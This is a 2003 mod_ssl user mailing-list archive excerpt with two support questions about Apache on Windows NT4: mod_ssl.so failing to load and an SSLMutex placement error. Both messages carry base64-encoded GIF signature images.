Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 18 15:46:10 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 822202AA051; Tue, 18 Mar 2003 15:46:10 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id 29C4C2AA04B; Tue, 18 Mar 2003 15:46:10 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from mail.tracedata.net (mail.tracedata.net [209.121.222.162])
	by master.modssl.org (Postfix) with ESMTP id C59AF2AA01A
	for ; Wed,  5 Mar 2003 21:10:04 +0100 (CET)
Received: from mohsin (service.tracedata.com [209.121.222.164]) by mail.tracedata.net
 (Vircom SMTPRS 4.7.192) with ESMTP id  for ;
 Wed, 5 Mar 2003 15:21:07 -0500
From: "Mohsin Sabir." 
To: 
Subject: mod_ssl.so??????
Date: Wed, 5 Mar 2003 15:15:42 -0500
Organization: Tracedata Services Inc.
Message-ID: <000001c2e353$ff3f6290$0801020a@Tracedata>
MIME-Version: 1.0
Content-Type: multipart/related;
	boundary="----=_NextPart_000_0001_01C2E32A.166AE130"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mohsin Sabir." 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0001_01C2E32A.166AE130
Content-Type: multipart/alternative;
	boundary="----=_NextPart_001_0002_01C2E32A.166C67D0"


------=_NextPart_001_0002_01C2E32A.166C67D0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

Hello:

I am working with Microsoft Web Servers from quite a while but opted to
go with Apache Web Servers because of it's stability and growing
demands.

I am trying to configure mod_ssl on WindowsNT4 Server running Apache.  I
have placed all the files where they belong exactly but I am getting
this error message:

CANNOT LOAD APACHE/MODULES/MOD_SSL.SO - I have learnt that  DLL's are
gone crazy which I placed under winnt\system32\ if so please assist how
can this glitch be rectified.

Kind Regards,

Mohsin

 

 
  Microsoft Certified System
EngineerMicrosoft Certified System Administrator

mailto:mohsin@tracedata.com 
 


    __________________________________________________ 


  The information transmitted is intended only for the person or entity
to which it is addressed and may contain confidential and/or privileged
material.  Any review, retransmission, dissemination or other use of, or
taking of any action in reliance upon, this information by persons or
entities other than the intended recipient is prohibited.   If you
received this in error, please contact the sender and delete the
material from any computer.
 

 


------=_NextPart_001_0002_01C2E32A.166C67D0
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable




Message








Hello:


I am working =
with Microsoft=20
Web Servers from quite a while but opted to go with Apache Web Servers =
because=20
of it's stability and growing demands.


I am trying to configure mod_ssl on =
WindowsNT4 Server running Apache.  I have placed all the files =
where they=20
belong exactly but I am getting this error message:


CANNOT LOAD APACHE/MODULES/MOD_SSL.SO - I have =
learnt=20
that  DLL's are gone crazy =
which I=20
placed under winnt\system32\ if so=20
please assist how can this glitch be =
rectified.


Kind=20
Regards,


Mohsin




 



 


3D"Microsoft


mailto:mohsin@tracedat=
a.com=20




   =20
__________________________________________________

  The =
information=20
transmitted is intended only for the person or entity to which it is =
addressed=20
and may contain confidential and/or privileged material.  Any =
review,=20
retransmission, dissemination or other use of, or taking of any action =
in=20
reliance upon, this information by persons or entities other than the =
intended=20
recipient is prohibited.   If you received this in error, =
please=20
contact the sender and delete the material from any=20
computer.
 


 


------=_NextPart_001_0002_01C2E32A.166C67D0--

------=_NextPart_000_0001_01C2E32A.166AE130
Content-Type: application/octet-stream;
	name="tracedata.GIF"
Content-Transfer-Encoding: base64
Content-ID: <501301120@05032003-1733>

R0lGODlhlgFZAPcAAElxrZiv0IqSpK+5zPP09+uWmORpbCc3V/bV1t5JTGiIu9s2OsIGBszX6MPH
0ExZdOXq84Kdx9nh7bPD3HWTwaWrufHu8GRvh9HV2+Di53mDlz5LacDN4hEiRjdipf7+/gAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAlgFZAAAI/wA/CBxI
sKDBgwgTKlzIsKHDhxAjSpxIsaLFixgzatzIsaPHjyBDihxJsqTJkyhTqlzJsqXLlzBjypxJs6bN
mzhdWihgYMGCBB6CBhgAIafRo0iTKh2JoKfPBAUIBPWggKoCCUuzat3KdSkBpz4NWBA4tapZCgS6
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

------=_NextPart_000_0001_01C2E32A.166AE130
Content-Type: application/octet-stream;
	name="mcse.gif"
Content-Transfer-Encoding: base64
Content-ID: <501301120@05032003-173A>

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

------=_NextPart_000_0001_01C2E32A.166AE130
Content-Type: application/octet-stream;
	name="mcsa.gif"
Content-Transfer-Encoding: base64
Content-ID: <501301120@05032003-1741>

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
AAA7

------=_NextPart_000_0001_01C2E32A.166AE130
Content-Type: application/octet-stream;
	name="Blank Bkgrd.gif"
Content-Transfer-Encoding: base64
Content-ID: <501301120@05032003-1748>

R0lGODlhLQAtAID/AP////f39ywAAAAALQAtAEACcAxup8vtvxKQsFon6d02898pGkgiYoCm6sq2
7iqWcmzOsmeXeA7uPJd5CYdD2g9oPF58ygqz+XhCG9JpJGmlYrPXGlfr/Yo/VW45e7amp2tou/lW
xo/zX513z+Vt+1n/tiX2pxP4NUhy2FM4xtjIUQAAOw==

------=_NextPart_000_0001_01C2E32A.166AE130--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 18 15:46:15 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B83AC2AA056; Tue, 18 Mar 2003 15:46:15 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id 4E1152AA054; Tue, 18 Mar 2003 15:46:15 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from mail.tracedata.net (mail.tracedata.net [209.121.222.162])
	by master.modssl.org (Postfix) with ESMTP id 138662AA01A
	for ; Wed,  5 Mar 2003 23:02:16 +0100 (CET)
Received: from mohsin (service.tracedata.com [209.121.222.164]) by mail.tracedata.net
 (Vircom SMTPRS 4.7.192) with ESMTP id  for ;
 Wed, 5 Mar 2003 17:13:19 -0500
From: "Mohsin Sabir." 
To: 
Subject: SSLMutex
Date: Wed, 5 Mar 2003 17:07:54 -0500
Organization: Tracedata Services Inc.
Message-ID: <000801c2e363$abd0a3c0$0801020a@Tracedata>
MIME-Version: 1.0
Content-Type: multipart/related;
	boundary="----=_NextPart_000_0009_01C2E339.C2FA9BC0"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mohsin Sabir." 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0009_01C2E339.C2FA9BC0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_001_000A_01C2E339.C2FA9BC0"


------=_NextPart_001_000A_01C2E339.C2FA9BC0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

When I try to start the Apache Server it gives an error:
 
SSLMutex cannot occur within the  section.
 
Please advise.
 
It is NT4 Server running.
 
Mohsin
 
 
 

 
  Microsoft Certified System
EngineerMicrosoft Certified System Administrator

mailto:mohsin@tracedata.com 
 


    __________________________________________________ 


  The information transmitted is intended only for the person or entity
to which it is addressed and may contain confidential and/or privileged
material.  Any review, retransmission, dissemination or other use of, or
taking of any action in reliance upon, this information by persons or
entities other than the intended recipient is prohibited.   If you
received this in error, please contact the sender and delete the
material from any computer.
 

 


------=_NextPart_001_000A_01C2E339.C2FA9BC0
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable




Message






When I try to start the Apache =
Server it=20
gives an error:


 


SSLMutex cannot occur within the =
<Virtual=20
Host > section.


 


Please advise.


 


It is NT4 Server =
running.


 


Mohsin


 


 


 



 


3D"Microsoft


mailto:mohsin@tracedat=
a.com=20




   =20
__________________________________________________

  The =
information=20
transmitted is intended only for the person or entity to which it is =
addressed=20
and may contain confidential and/or privileged material.  Any =
review,=20
retransmission, dissemination or other use of, or taking of any action =
in=20
reliance upon, this information by persons or entities other than the =
intended=20
recipient is prohibited.   If you received this in error, =
please=20
contact the sender and delete the material from any =
computer.
 


 


------=_NextPart_001_000A_01C2E339.C2FA9BC0--

------=_NextPart_000_0009_01C2E339.C2FA9BC0
Content-Type: application/octet-stream;
	name="tracedata.GIF"
Content-Transfer-Encoding: base64
Content-ID: <775500622@05032003-1787>

R0lGODlhlgFZAPcAAElxrZiv0IqSpK+5zPP09+uWmORpbCc3V/bV1t5JTGiIu9s2OsIGBszX6MPH
0ExZdOXq84Kdx9nh7bPD3HWTwaWrufHu8GRvh9HV2+Di53mDlz5LacDN4hEiRjdipf7+/gAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
